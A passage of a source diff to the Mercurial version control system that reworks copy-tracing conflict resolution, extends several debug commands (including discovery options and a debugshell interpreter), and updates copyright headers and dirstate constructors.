for k, v in list(t.items()): - # remove copies from files that didn't exist - if v not in src: + if k == v: # case 3 del t[k] - # remove criss-crossed copies - elif k in src and v in dst: + elif v not in src: # case 5 + # remove copies from files that didn't exist del t[k] - # remove copies to files that were then removed - elif k not in dst: + elif k not in dst: # case 1 + # remove copies to files that were then removed del t[k] @@ -150,16 +149,24 @@ # optimization, since the ctx.files() for a merge commit is not correct for # this comparison. forwardmissingmatch = match - if b.p1() == a and b.p2().node() == nullid: + if b.p1() == a and b.p2().rev() == nullrev: filesmatcher = matchmod.exact(b.files()) forwardmissingmatch = matchmod.intersectmatchers(match, filesmatcher) - missing = _computeforwardmissing(a, b, match=forwardmissingmatch) + if repo.ui.configbool(b'devel', b'copy-tracing.trace-all-files'): + missing = list(b.walk(match)) + # _computeforwardmissing(a, b, match=forwardmissingmatch) + if debug: + dbg(b'debug.copies: searching all files: %d\n' % len(missing)) + else: + missing = _computeforwardmissing(a, b, match=forwardmissingmatch) + if debug: + dbg( + b'debug.copies: missing files to search: %d\n' + % len(missing) + ) ancestrycontext = a._repo.changelog.ancestors([b.rev()], inclusive=True) - if debug: - dbg(b'debug.copies: missing files to search: %d\n' % len(missing)) - for f in sorted(missing): if debug: dbg(b'debug.copies: tracing file: %s\n' % f) @@ -267,6 +274,7 @@ revs = cl.findmissingrevs(common=[a.rev()], heads=[b.rev()]) roots = set() has_graph_roots = False + multi_thread = repo.ui.configbool(b'devel', b'copy-tracing.multi-thread') # iterate over `only(B, A)` for r in revs: @@ -314,7 +322,13 @@ children_count[p] += 1 revinfo = _revinfo_getter(repo, match) return _combine_changeset_copies( - revs, children_count, b.rev(), revinfo, match, isancestor + revs, + children_count, + b.rev(), + revinfo, + match, + isancestor, + multi_thread, ) else: 
# When not using side-data, we will process the edges "from" the parent. @@ -339,7 +353,7 @@ def _combine_changeset_copies( - revs, children_count, targetrev, revinfo, match, isancestor + revs, children_count, targetrev, revinfo, match, isancestor, multi_thread ): """combine the copies information for each item of iterrevs @@ -356,7 +370,7 @@ if rustmod is not None: final_copies = rustmod.combine_changeset_copies( - list(revs), children_count, targetrev, revinfo, isancestor + list(revs), children_count, targetrev, revinfo, multi_thread ) else: isancestor = cached_is_ancestor(isancestor) @@ -427,7 +441,11 @@ # potential filelog related behavior. assert parent == 2 current_copies = _merge_copies_dict( - newcopies, current_copies, isancestor, changes + newcopies, + current_copies, + isancestor, + changes, + current_rev, ) all_copies[current_rev] = current_copies @@ -449,7 +467,7 @@ PICK_EITHER = 2 -def _merge_copies_dict(minor, major, isancestor, changes): +def _merge_copies_dict(minor, major, isancestor, changes, current_merge): """merge two copies-mapping together, minor and major In case of conflict, value from "major" will be picked. @@ -467,39 +485,75 @@ if other is None: minor[dest] = value else: - pick = _compare_values(changes, isancestor, dest, other, value) - if pick == PICK_MAJOR: + pick, overwrite = _compare_values( + changes, isancestor, dest, other, value + ) + if overwrite: + if pick == PICK_MAJOR: + minor[dest] = (current_merge, value[1]) + else: + minor[dest] = (current_merge, other[1]) + elif pick == PICK_MAJOR: minor[dest] = value return minor def _compare_values(changes, isancestor, dest, minor, major): - """compare two value within a _merge_copies_dict loop iteration""" + """compare two value within a _merge_copies_dict loop iteration + + return (pick, overwrite). + + - pick is one of PICK_MINOR, PICK_MAJOR or PICK_EITHER + - overwrite is True if pick is a return of an ambiguity that needs resolution. 
+ """ major_tt, major_value = major minor_tt, minor_value = minor - # evacuate some simple case first: if major_tt == minor_tt: # if it comes from the same revision it must be the same value assert major_value == minor_value - return PICK_EITHER - elif major[1] == minor[1]: - return PICK_EITHER - - # actual merging needed: content from "major" wins, unless it is older than - # the branch point or there is a merge - elif changes is not None and major[1] is None and dest in changes.salvaged: - return PICK_MINOR - elif changes is not None and minor[1] is None and dest in changes.salvaged: - return PICK_MAJOR - elif changes is not None and dest in changes.merged: - return PICK_MAJOR - elif not isancestor(major_tt, minor_tt): - if major[1] is not None: - return PICK_MAJOR - elif isancestor(minor_tt, major_tt): - return PICK_MAJOR - return PICK_MINOR + return PICK_EITHER, False + elif ( + changes is not None + and minor_value is not None + and major_value is None + and dest in changes.salvaged + ): + # In this case, a deletion was reverted, the "alive" value overwrite + # the deleted one. + return PICK_MINOR, True + elif ( + changes is not None + and major_value is not None + and minor_value is None + and dest in changes.salvaged + ): + # In this case, a deletion was reverted, the "alive" value overwrite + # the deleted one. + return PICK_MAJOR, True + elif isancestor(minor_tt, major_tt): + if changes is not None and dest in changes.merged: + # change to dest happened on the branch without copy-source change, + # so both source are valid and "major" wins. + return PICK_MAJOR, True + else: + return PICK_MAJOR, False + elif isancestor(major_tt, minor_tt): + if changes is not None and dest in changes.merged: + # change to dest happened on the branch without copy-source change, + # so both source are valid and "major" wins. + return PICK_MAJOR, True + else: + return PICK_MINOR, False + elif minor_value is None: + # in case of conflict, the "alive" side wins. 
+ return PICK_MAJOR, True + elif major_value is None: + # in case of conflict, the "alive" side wins. + return PICK_MINOR, True + else: + # in case of conflict where both side are alive, major wins. + return PICK_MAJOR, True def _revinfo_getter_extra(repo): @@ -650,22 +704,28 @@ def _backwardrenames(a, b, match): + """find renames from a to b""" if a._repo.ui.config(b'experimental', b'copytrace') == b'off': return {} + # We don't want to pass in "match" here, since that would filter + # the destination by it. Since we're reversing the copies, we want + # to filter the source instead. + copies = _forwardcopies(b, a) + return _reverse_renames(copies, a, match) + + +def _reverse_renames(copies, dst, match): + """given copies to context 'dst', finds renames from that context""" # Even though we're not taking copies into account, 1:n rename situations # can still exist (e.g. hg cp a b; hg mv a c). In those cases we # arbitrarily pick one of the renames. - # We don't want to pass in "match" here, since that would filter - # the destination by it. Since we're reversing the copies, we want - # to filter the source instead. 
- f = _forwardcopies(b, a) r = {} - for k, v in sorted(pycompat.iteritems(f)): + for k, v in sorted(pycompat.iteritems(copies)): if match and not match(v): continue # remove copies - if v in a: + if v in dst: continue r[v] = k return r @@ -701,9 +761,17 @@ base = None if a.rev() != nullrev: base = x + x_copies = _forwardcopies(a, x) + y_copies = _forwardcopies(a, y, base, match=match) + same_keys = set(x_copies) & set(y_copies) + for k in same_keys: + if x_copies.get(k) == y_copies.get(k): + del x_copies[k] + del y_copies[k] + x_backward_renames = _reverse_renames(x_copies, x, match) copies = _chain( - _backwardrenames(x, a, match=match), - _forwardcopies(a, y, base, match=match), + x_backward_renames, + y_copies, ) _filter(x, y, copies) return copies @@ -1042,11 +1110,17 @@ b" discovered dir src: '%s' -> dst: '%s'\n" % (d, dirmove[d]) ) + # Sort the directories in reverse order, so we find children first + # For example, if dir1/ was renamed to dir2/, and dir1/subdir1/ + # was renamed to dir2/subdir2/, we want to move dir1/subdir1/file + # to dir2/subdir2/file (not dir2/subdir1/file) + dirmove_children_first = sorted(dirmove, reverse=True) + movewithdir = {} # check unaccounted nonoverlapping files against directory moves for f in addedfilesfn(): if f not in fullcopy: - for d in dirmove: + for d in dirmove_children_first: if f.startswith(d): # new file added in a directory that was moved, move it df = dirmove[d] + f[len(d) :] @@ -1220,6 +1294,15 @@ by merge.update(). """ new_copies = pathcopies(base, ctx) - _filter(wctx.p1(), wctx, new_copies) + parent = wctx.p1() + _filter(parent, wctx, new_copies) + # Extra filtering to drop copy information for files that existed before + # the graft. This is to handle the case of grafting a rename onto a commit + # that already has the rename. Otherwise the presence of copy information + # would result in the creation of an empty commit where we would prefer to + # not create one. 
+ for dest, __ in list(new_copies.items()): + if dest in parent: + del new_copies[dest] for dst, src in pycompat.iteritems(new_copies): wctx[dst].markcopied(src) diff --git a/mercurial/dagop.py b/mercurial/dagop.py --- a/mercurial/dagop.py +++ b/mercurial/dagop.py @@ -1,6 +1,6 @@ # dagop.py - graph ancestry and topology algorithm for revset # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -1,6 +1,6 @@ # debugcommands.py - command processing for debug* commands # -# Copyright 2005-2016 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2016 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
@@ -9,6 +9,7 @@ import codecs import collections +import contextlib import difflib import errno import glob @@ -69,6 +70,7 @@ pycompat, registrar, repair, + repoview, revlog, revset, revsetlang, @@ -96,6 +98,7 @@ dateutil, procutil, stringutil, + urlutil, ) from .revlogutils import ( @@ -345,7 +348,7 @@ def showchunks(named): ui.write(b"\n%s%s\n" % (indent_string, named)) for deltadata in gen.deltaiter(): - node, p1, p2, cs, deltabase, delta, flags = deltadata + node, p1, p2, cs, deltabase, delta, flags, sidedata = deltadata ui.write( b"%s%s %s %s %s %s %d\n" % ( @@ -371,7 +374,7 @@ raise error.Abort(_(b'use debugbundle2 for this file')) gen.changelogheader() for deltadata in gen.deltaiter(): - node, p1, p2, cs, deltabase, delta, flags = deltadata + node, p1, p2, cs, deltabase, delta, flags, sidedata = deltadata ui.write(b"%s%s\n" % (indent_string, hex(node))) @@ -470,27 +473,47 @@ """lists the capabilities of a remote peer""" opts = pycompat.byteskwargs(opts) peer = hg.peer(ui, opts, path) - caps = peer.capabilities() - ui.writenoi18n(b'Main capabilities:\n') - for c in sorted(caps): - ui.write(b' %s\n' % c) - b2caps = bundle2.bundle2caps(peer) - if b2caps: - ui.writenoi18n(b'Bundle2 capabilities:\n') - for key, values in sorted(pycompat.iteritems(b2caps)): - ui.write(b' %s\n' % key) - for v in values: - ui.write(b' %s\n' % v) - - -@command(b'debugchangedfiles', [], b'REV') -def debugchangedfiles(ui, repo, rev): + try: + caps = peer.capabilities() + ui.writenoi18n(b'Main capabilities:\n') + for c in sorted(caps): + ui.write(b' %s\n' % c) + b2caps = bundle2.bundle2caps(peer) + if b2caps: + ui.writenoi18n(b'Bundle2 capabilities:\n') + for key, values in sorted(pycompat.iteritems(b2caps)): + ui.write(b' %s\n' % key) + for v in values: + ui.write(b' %s\n' % v) + finally: + peer.close() + + +@command( + b'debugchangedfiles', + [ + ( + b'', + b'compute', + False, + b"compute information instead of reading it from storage", + ), + ], + b'REV', +) +def 
debugchangedfiles(ui, repo, rev, **opts): """list the stored files changes for a revision""" ctx = scmutil.revsingle(repo, rev, None) - sd = repo.changelog.sidedata(ctx.rev()) - files_block = sd.get(sidedata.SD_FILES) - if files_block is not None: - files = metadata.decode_files_sidedata(sd) + files = None + + if opts['compute']: + files = metadata.compute_all_files_changes(ctx) + else: + sd = repo.changelog.sidedata(ctx.rev()) + files_block = sd.get(sidedata.SD_FILES) + if files_block is not None: + files = metadata.decode_files_sidedata(sd) + if files is not None: for f in sorted(files.touched): if f in files.added: action = b"added" @@ -964,20 +987,111 @@ ), (b'', b'rev', [], b'restrict discovery to this set of revs'), (b'', b'seed', b'12323', b'specify the random seed use for discovery'), + ( + b'', + b'local-as-revs', + b"", + b'treat local as having these revisions only', + ), + ( + b'', + b'remote-as-revs', + b"", + b'use local as remote, with only these revisions', + ), ] - + cmdutil.remoteopts, + + cmdutil.remoteopts + + cmdutil.formatteropts, _(b'[--rev REV] [OTHER]'), ) def debugdiscovery(ui, repo, remoteurl=b"default", **opts): - """runs the changeset discovery protocol in isolation""" + """runs the changeset discovery protocol in isolation + + The local peer can be "replaced" by a subset of the local repository by + using the `--local-as-revs` flag. In the same way, the usual `remote` peer can + be "replaced" by a subset of the local repository using the + `--remote-as-revs` flag. This is useful to efficiently debug pathological + discovery situations. + + The following developer oriented config options are relevant for people playing with this command: + + * devel.discovery.exchange-heads=True + + If False, the discovery will not start with + remote head fetching and local head querying.
+ + * devel.discovery.grow-sample=True + + If False, the sample size used in set discovery will not be increased + through the process + + * devel.discovery.grow-sample.dynamic=True + + When discovery.grow-sample.dynamic is True, the default, the sample size is + adapted to the shape of the undecided set (it is set to the max of: + <target-size>, len(roots(undecided)), len(heads(undecided)) + + * devel.discovery.grow-sample.rate=1.05 + + the rate at which the sample grows + + * devel.discovery.randomize=True + + If False, random sampling during discovery is deterministic. It is meant for + integration tests. + + * devel.discovery.sample-size=200 + + Control the initial size of the discovery sample + + * devel.discovery.sample-size.initial=100 + + Control the initial size of the discovery for initial change + """ opts = pycompat.byteskwargs(opts) - remoteurl, branches = hg.parseurl(ui.expandpath(remoteurl)) - remote = hg.peer(repo, opts, remoteurl) - ui.status(_(b'comparing with %s\n') % util.hidepassword(remoteurl)) + unfi = repo.unfiltered() + + # setup potential extra filtering + local_revs = opts[b"local_as_revs"] + remote_revs = opts[b"remote_as_revs"] # make sure tests are repeatable random.seed(int(opts[b'seed'])) + if not remote_revs: + + remoteurl, branches = urlutil.get_unique_pull_path( + b'debugdiscovery', repo, ui, remoteurl + ) + remote = hg.peer(repo, opts, remoteurl) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(remoteurl)) + else: + branches = (None, []) + remote_filtered_revs = scmutil.revrange( + unfi, [b"not (::(%s))" % remote_revs] + ) + remote_filtered_revs = frozenset(remote_filtered_revs) + + def remote_func(x): + return remote_filtered_revs + + repoview.filtertable[b'debug-discovery-remote-filter'] = remote_func + + remote = repo.peer() + remote._repo = remote._repo.filtered(b'debug-discovery-remote-filter') + + if local_revs: + local_filtered_revs = scmutil.revrange( + unfi, [b"not (::(%s))" % local_revs] + ) + local_filtered_revs = 
frozenset(local_filtered_revs) + + def local_func(x): + return local_filtered_revs + + repoview.filtertable[b'debug-discovery-local-filter'] = local_func + repo = repo.filtered(b'debug-discovery-local-filter') + data = {} if opts.get(b'old'): @@ -1014,8 +1128,21 @@ remoterevs, _checkout = hg.addbranchrevs(repo, remote, branches, revs=None) localrevs = opts[b'rev'] - with util.timedcm('debug-discovery') as t: - common, hds = doit(localrevs, remoterevs) + + fm = ui.formatter(b'debugdiscovery', opts) + if fm.strict_format: + + @contextlib.contextmanager + def may_capture_output(): + ui.pushbuffer() + yield + data[b'output'] = ui.popbuffer() + + else: + may_capture_output = util.nullcontextmanager + with may_capture_output(): + with util.timedcm('debug-discovery') as t: + common, hds = doit(localrevs, remoterevs) # compute all statistics heads_common = set(common) @@ -1066,50 +1193,41 @@ data[b'nb-ini_und-common'] = len(common_initial_undecided) data[b'nb-ini_und-missing'] = len(missing_initial_undecided) + fm.startitem() + fm.data(**pycompat.strkwargs(data)) # display discovery summary - ui.writenoi18n(b"elapsed time: %(elapsed)f seconds\n" % data) - ui.writenoi18n(b"round-trips: %(total-roundtrips)9d\n" % data) - ui.writenoi18n(b"heads summary:\n") - ui.writenoi18n(b" total common heads: %(nb-common-heads)9d\n" % data) - ui.writenoi18n( - b" also local heads: %(nb-common-heads-local)9d\n" % data - ) - ui.writenoi18n( - b" also remote heads: %(nb-common-heads-remote)9d\n" % data - ) - ui.writenoi18n(b" both: %(nb-common-heads-both)9d\n" % data) - ui.writenoi18n(b" local heads: %(nb-head-local)9d\n" % data) - ui.writenoi18n( - b" common: %(nb-common-heads-local)9d\n" % data - ) - ui.writenoi18n( - b" missing: %(nb-head-local-missing)9d\n" % data - ) - ui.writenoi18n(b" remote heads: %(nb-head-remote)9d\n" % data) - ui.writenoi18n( - b" common: %(nb-common-heads-remote)9d\n" % data - ) - ui.writenoi18n( - b" unknown: %(nb-head-remote-unknown)9d\n" % data - ) - 
ui.writenoi18n(b"local changesets: %(nb-revs)9d\n" % data) - ui.writenoi18n(b" common: %(nb-revs-common)9d\n" % data) - ui.writenoi18n(b" heads: %(nb-common-heads)9d\n" % data) - ui.writenoi18n(b" roots: %(nb-common-roots)9d\n" % data) - ui.writenoi18n(b" missing: %(nb-revs-missing)9d\n" % data) - ui.writenoi18n(b" heads: %(nb-missing-heads)9d\n" % data) - ui.writenoi18n(b" roots: %(nb-missing-roots)9d\n" % data) - ui.writenoi18n(b" first undecided set: %(nb-ini_und)9d\n" % data) - ui.writenoi18n(b" heads: %(nb-ini_und-heads)9d\n" % data) - ui.writenoi18n(b" roots: %(nb-ini_und-roots)9d\n" % data) - ui.writenoi18n(b" common: %(nb-ini_und-common)9d\n" % data) - ui.writenoi18n(b" missing: %(nb-ini_und-missing)9d\n" % data) + fm.plain(b"elapsed time: %(elapsed)f seconds\n" % data) + fm.plain(b"round-trips: %(total-roundtrips)9d\n" % data) + fm.plain(b"heads summary:\n") + fm.plain(b" total common heads: %(nb-common-heads)9d\n" % data) + fm.plain(b" also local heads: %(nb-common-heads-local)9d\n" % data) + fm.plain(b" also remote heads: %(nb-common-heads-remote)9d\n" % data) + fm.plain(b" both: %(nb-common-heads-both)9d\n" % data) + fm.plain(b" local heads: %(nb-head-local)9d\n" % data) + fm.plain(b" common: %(nb-common-heads-local)9d\n" % data) + fm.plain(b" missing: %(nb-head-local-missing)9d\n" % data) + fm.plain(b" remote heads: %(nb-head-remote)9d\n" % data) + fm.plain(b" common: %(nb-common-heads-remote)9d\n" % data) + fm.plain(b" unknown: %(nb-head-remote-unknown)9d\n" % data) + fm.plain(b"local changesets: %(nb-revs)9d\n" % data) + fm.plain(b" common: %(nb-revs-common)9d\n" % data) + fm.plain(b" heads: %(nb-common-heads)9d\n" % data) + fm.plain(b" roots: %(nb-common-roots)9d\n" % data) + fm.plain(b" missing: %(nb-revs-missing)9d\n" % data) + fm.plain(b" heads: %(nb-missing-heads)9d\n" % data) + fm.plain(b" roots: %(nb-missing-roots)9d\n" % data) + fm.plain(b" first undecided set: %(nb-ini_und)9d\n" % data) + fm.plain(b" heads: %(nb-ini_und-heads)9d\n" % data) + 
fm.plain(b" roots: %(nb-ini_und-roots)9d\n" % data) + fm.plain(b" common: %(nb-ini_und-common)9d\n" % data) + fm.plain(b" missing: %(nb-ini_und-missing)9d\n" % data) if ui.verbose: - ui.writenoi18n( + fm.plain( b"common heads: %s\n" % b" ".join(sorted(short(n) for n in heads_common)) ) + fm.end() _chunksize = 4 << 10 @@ -2214,9 +2332,9 @@ b'', b'dump-new', False, - _(b'write a (new) persistent binary nodemap on stdin'), + _(b'write a (new) persistent binary nodemap on stdout'), ), - (b'', b'dump-disk', False, _(b'dump on-disk data on stdin')), + (b'', b'dump-disk', False, _(b'dump on-disk data on stdout')), ( b'', b'check', @@ -2546,12 +2664,17 @@ with ui.configoverride(overrides): peer = hg.peer(ui, {}, path) - local = peer.local() is not None - canpush = peer.canpush() - - ui.write(_(b'url: %s\n') % peer.url()) - ui.write(_(b'local: %s\n') % (_(b'yes') if local else _(b'no'))) - ui.write(_(b'pushable: %s\n') % (_(b'yes') if canpush else _(b'no'))) + try: + local = peer.local() is not None + canpush = peer.canpush() + + ui.write(_(b'url: %s\n') % peer.url()) + ui.write(_(b'local: %s\n') % (_(b'yes') if local else _(b'no'))) + ui.write( + _(b'pushable: %s\n') % (_(b'yes') if canpush else _(b'no')) + ) + finally: + peer.close() @command( @@ -2654,26 +2777,30 @@ """ target = hg.peer(ui, {}, repopath) - if keyinfo: - key, old, new = keyinfo - with target.commandexecutor() as e: - r = e.callcommand( - b'pushkey', - { - b'namespace': namespace, - b'key': key, - b'old': old, - b'new': new, - }, - ).result() - - ui.status(pycompat.bytestr(r) + b'\n') - return not r - else: - for k, v in sorted(pycompat.iteritems(target.listkeys(namespace))): - ui.write( - b"%s\t%s\n" % (stringutil.escapestr(k), stringutil.escapestr(v)) - ) + try: + if keyinfo: + key, old, new = keyinfo + with target.commandexecutor() as e: + r = e.callcommand( + b'pushkey', + { + b'namespace': namespace, + b'key': key, + b'old': old, + b'new': new, + }, + ).result() + + ui.status(pycompat.bytestr(r) + 
b'\n') + return not r + else: + for k, v in sorted(pycompat.iteritems(target.listkeys(namespace))): + ui.write( + b"%s\t%s\n" + % (stringutil.escapestr(k), stringutil.escapestr(v)) + ) + finally: + target.close() @command(b'debugpvec', [], _(b'A B')) @@ -3527,8 +3654,10 @@ ) source = b"default" - source, branches = hg.parseurl(ui.expandpath(source)) - url = util.url(source) + source, branches = urlutil.get_unique_pull_path( + b'debugssl', repo, ui, source + ) + url = urlutil.url(source) defaultport = {b'https': 443, b'ssh': 22} if url.scheme in defaultport: @@ -3636,8 +3765,14 @@ for backup in backups: # Much of this is copied from the hg incoming logic - source = ui.expandpath(os.path.relpath(backup, encoding.getcwd())) - source, branches = hg.parseurl(source, opts.get(b"branch")) + source = os.path.relpath(backup, encoding.getcwd()) + source, branches = urlutil.get_unique_pull_path( + b'debugbackupbundle', + repo, + ui, + source, + default_branches=opts.get(b'branch'), + ) try: other = hg.peer(repo, opts, source) except error.LookupError as ex: @@ -3719,6 +3854,23 @@ ui.writenoi18n(b' revision %s\n' % v[1]) +@command(b'debugshell', optionalrepo=True) +def debugshell(ui, repo): + """run an interactive Python interpreter + + The local namespace is provided with a reference to the ui and + the repo instance (if available). 
+ """ + import code + + imported_objects = { + 'ui': ui, + 'repo': repo, + } + + code.interact(local=imported_objects) + + @command( b'debugsuccessorssets', [(b'', b'closest', False, _(b'return closest successors sets only'))], @@ -3779,10 +3931,19 @@ def debugtagscache(ui, repo): """display the contents of .hg/cache/hgtagsfnodes1""" cache = tagsmod.hgtagsfnodescache(repo.unfiltered()) + flog = repo.file(b'.hgtags') for r in repo: node = repo[r].node() tagsnode = cache.getfnode(node, computemissing=False) - tagsnodedisplay = hex(tagsnode) if tagsnode else b'missing/invalid' + if tagsnode: + tagsnodedisplay = hex(tagsnode) + if not flog.hasnode(tagsnode): + tagsnodedisplay += b' (unknown node)' + elif tagsnode is None: + tagsnodedisplay = b'missing' + else: + tagsnodedisplay = b'invalid' + ui.write(b'%d %s %s\n' % (r, hex(node), tagsnodedisplay)) @@ -4000,19 +4161,22 @@ def debugwireargs(ui, repopath, *vals, **opts): opts = pycompat.byteskwargs(opts) repo = hg.peer(ui, opts, repopath) - for opt in cmdutil.remoteopts: - del opts[opt[1]] - args = {} - for k, v in pycompat.iteritems(opts): - if v: - args[k] = v - args = pycompat.strkwargs(args) - # run twice to check that we don't mess up the stream for the next command - res1 = repo.debugwireargs(*vals, **args) - res2 = repo.debugwireargs(*vals, **args) - ui.write(b"%s\n" % res1) - if res1 != res2: - ui.warn(b"%s\n" % res2) + try: + for opt in cmdutil.remoteopts: + del opts[opt[1]] + args = {} + for k, v in pycompat.iteritems(opts): + if v: + args[k] = v + args = pycompat.strkwargs(args) + # run twice to check that we don't mess up the stream for the next command + res1 = repo.debugwireargs(*vals, **args) + res2 = repo.debugwireargs(*vals, **args) + ui.write(b"%s\n" % res1) + if res1 != res2: + ui.warn(b"%s\n" % res2) + finally: + repo.close() def _parsewirelangblocks(fh): @@ -4372,7 +4536,7 @@ # We bypass hg.peer() so we can proxy the sockets. 
# TODO consider not doing this because we skip # ``hg.wirepeersetupfuncs`` and potentially other useful functionality. - u = util.url(path) + u = urlutil.url(path) if u.scheme != b'http': raise error.Abort(_(b'only http:// paths are currently supported')) diff --git a/mercurial/destutil.py b/mercurial/destutil.py --- a/mercurial/destutil.py +++ b/mercurial/destutil.py @@ -1,6 +1,6 @@ # destutil.py - Mercurial utility function for command destination # -# Copyright Matt Mackall <mpm@selenic.com> and other +# Copyright Olivia Mackall <olivia@selenic.com> and other # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/diffhelper.py b/mercurial/diffhelper.py --- a/mercurial/diffhelper.py +++ b/mercurial/diffhelper.py @@ -1,6 +1,6 @@ # diffhelper.py - helper routines for patch # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/dirstate.py b/mercurial/dirstate.py --- a/mercurial/dirstate.py +++ b/mercurial/dirstate.py @@ -1,6 +1,6 @@ # dirstate.py - working directory tracking for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -73,13 +73,16 @@ @interfaceutil.implementer(intdirstate.idirstate) class dirstate(object): - def __init__(self, opener, ui, root, validate, sparsematchfn): + def __init__( + self, opener, ui, root, validate, sparsematchfn, nodeconstants + ): """Create a new dirstate object. 
opener is an open()-like callable that can be used to open the dirstate file; root is the root of the directory tracked by the dirstate. """ + self._nodeconstants = nodeconstants self._opener = opener self._validate = validate self._root = root @@ -136,7 +139,9 @@ @propertycache def _map(self): """Return the dirstate contents (see documentation for dirstatemap).""" - self._map = self._mapcls(self._ui, self._opener, self._root) + self._map = self._mapcls( + self._ui, self._opener, self._root, self._nodeconstants + ) return self._map @property @@ -1425,12 +1430,13 @@ denormalized form that they appear as in the dirstate. """ - def __init__(self, ui, opener, root): + def __init__(self, ui, opener, root, nodeconstants): self._ui = ui self._opener = opener self._root = root self._filename = b'dirstate' self._nodelen = 20 + self._nodeconstants = nodeconstants self._parents = None self._dirtyparents = False @@ -1729,7 +1735,8 @@ if rustmod is not None: class dirstatemap(object): - def __init__(self, ui, opener, root): + def __init__(self, ui, opener, root, nodeconstants): + self._nodeconstants = nodeconstants self._ui = ui self._opener = opener self._root = root diff --git a/mercurial/dirstateguard.py b/mercurial/dirstateguard.py --- a/mercurial/dirstateguard.py +++ b/mercurial/dirstateguard.py @@ -1,6 +1,6 @@ # dirstateguard.py - class to allow restoring dirstate after failure # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/discovery.py b/mercurial/discovery.py --- a/mercurial/discovery.py +++ b/mercurial/discovery.py @@ -1,6 +1,6 @@ # discovery.py - protocol changeset discovery functions # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -270,9 +270,12 @@ # C. Update newmap with outgoing changes. # This will possibly add new heads and remove existing ones. newmap = branchmap.remotebranchcache( - (branch, heads[1]) - for branch, heads in pycompat.iteritems(headssum) - if heads[0] is not None + repo, + ( + (branch, heads[1]) + for branch, heads in pycompat.iteritems(headssum) + if heads[0] is not None + ), ) newmap.update(repo, (ctx.rev() for ctx in missingctx)) for branch, newheads in pycompat.iteritems(newmap): diff --git a/mercurial/dispatch.py b/mercurial/dispatch.py --- a/mercurial/dispatch.py +++ b/mercurial/dispatch.py @@ -1,6 +1,6 @@ # dispatch.py - command dispatching for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
@@ -50,6 +50,7 @@ from .utils import ( procutil, stringutil, + urlutil, ) @@ -990,7 +991,7 @@ lui.readconfig(os.path.join(path, b".hg", b"hgrc-not-shared"), path) if rpath: - path = lui.expandpath(rpath) + path = urlutil.get_clone_path(lui, rpath)[0] lui = ui.copy() if rcutil.use_repo_hgrc(): _readsharedsourceconfig(lui, path) diff --git a/mercurial/encoding.py b/mercurial/encoding.py --- a/mercurial/encoding.py +++ b/mercurial/encoding.py @@ -1,6 +1,6 @@ # encoding.py - character transcoding support for Mercurial # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/error.py b/mercurial/error.py --- a/mercurial/error.py +++ b/mercurial/error.py @@ -1,6 +1,6 @@ # error.py - Mercurial exceptions # -# Copyright 2005-2008 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2008 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
@@ -20,7 +20,13 @@ if pycompat.TYPE_CHECKING: from typing import ( + Any, + AnyStr, + Iterable, + List, Optional, + Sequence, + Union, ) @@ -60,6 +66,7 @@ class SidedataHashError(RevlogError): def __init__(self, key, expected, got): + self.hint = None self.sidedatakey = key self.expecteddigest = expected self.actualdigest = got @@ -77,9 +84,9 @@ # Python 2.6+ complain about the 'message' property being deprecated self.lookupmessage = message if isinstance(name, bytes) and len(name) == 20: - from .node import short + from .node import hex - name = short(name) + name = hex(name) # if name is a binary node, it can be None RevlogError.__init__( self, b'%s@%s: %s' % (index, pycompat.bytestr(name), message) @@ -108,6 +115,7 @@ """Exception raised on errors in parsing the command line.""" def __init__(self, command, message): + # type: (bytes, bytes) -> None self.command = command self.message = message super(CommandError, self).__init__() @@ -119,6 +127,7 @@ """Exception raised if command is not in the command table.""" def __init__(self, command, all_commands=None): + # type: (bytes, Optional[List[bytes]]) -> None self.command = command self.all_commands = all_commands super(UnknownCommand, self).__init__() @@ -130,6 +139,7 @@ """Exception raised if command shortcut matches more than one command.""" def __init__(self, prefix, matches): + # type: (bytes, List[bytes]) -> None self.prefix = prefix self.matches = matches super(AmbiguousCommand, self).__init__() @@ -141,6 +151,7 @@ """Exception raised when a worker process dies.""" def __init__(self, status_code): + # type: (int) -> None self.status_code = status_code # Pass status code to superclass just so it becomes part of __bytes__ super(WorkerError, self).__init__(status_code) @@ -158,6 +169,7 @@ """Exception raised when a continuable command required merge conflict resolution.""" def __init__(self, opname): + # type: (bytes) -> None from .i18n import _ self.opname = opname @@ -193,6 +205,7 @@ return 
